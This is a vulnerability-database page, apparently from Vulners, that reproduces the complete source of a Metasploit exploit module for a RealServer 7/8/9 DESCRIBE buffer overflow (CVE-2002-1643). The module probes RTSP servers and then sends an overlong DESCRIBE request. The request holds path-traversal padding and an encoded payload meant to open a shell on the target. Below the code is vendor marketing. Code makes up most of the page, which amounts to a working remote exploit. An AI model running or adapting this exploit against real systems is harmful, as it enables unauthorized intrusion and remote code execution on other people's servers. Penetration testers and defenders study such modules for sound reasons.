Lucene search
+L

RealServer Describe Buffer Overflow

🗓️ 28 Dec 2006 23:42:36Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 75 Views

RealServer Describe Buffer Overflow exploit against RealServer 7/8/9 with buffer overflow. Reliably works on Linux, BSD, and Windows-based server

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2002-1643
7 Aug 201000:00
circl
CVE
CVE-2002-1643
28 Mar 200505:00
cve
Cvelist
CVE-2002-1643
28 Mar 200505:00
cvelist
Exploit DB
RealServer - Describe Buffer Overflow (Metasploit)
7 Aug 201000:00
exploitdb
NVD
CVE-2002-1643
19 Dec 200205:00
nvd
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealServer Describe Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in RealServer 7/8/9
        and was based on Johnny Cyberpunk's THCrealbad exploit. This
        code should reliably exploit Linux, BSD, and Windows-based
        servers.
      },
      'Author'         => 'hdm',
      'References'     =>
        [
          [ 'CVE', '2002-1643' ],
          [ 'OSVDB', '4468']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 2000,
          'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
        },
      'Platform'       => %w{ bsd linux win },
      'Targets'        =>
        [
          [
            'Universal',
            {
              'Platform' => %w{ bsd linux win }
            },
          ],
        ],
      'DisclosureDate' => '2002-12-20',
      'DefaultTarget' => 0))
  end

  def check
    res = send_request_raw(
      {
        'method' => 'OPTIONS',
        'proto'  => 'RTSP',
        'version' => '1.0',
        'uri'    => '/'
      }, 5)

    info = http_fingerprint({ :response => res })  # check method / Custom server check
    if res and res['Server']
      vprint_status("Found RTSP: #{res['Server']}")
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("RealServer universal exploit launched against #{rhost}")
    print_status("Kill the master rmserver pid to prevent shell disconnect")

    encoded = Rex::Text.to_hex(payload.encoded, "%")

    res = send_request_raw({
      'method' => 'DESCRIBE',
      'proto'  => 'RTSP',
      'version' => '1.0',
      'uri'    => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"
    }, 5)

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Dec 2020 10:31Current
0.6Low risk
Vulners AI Score0.6
CVSS 27.5
EPSS0.7432
75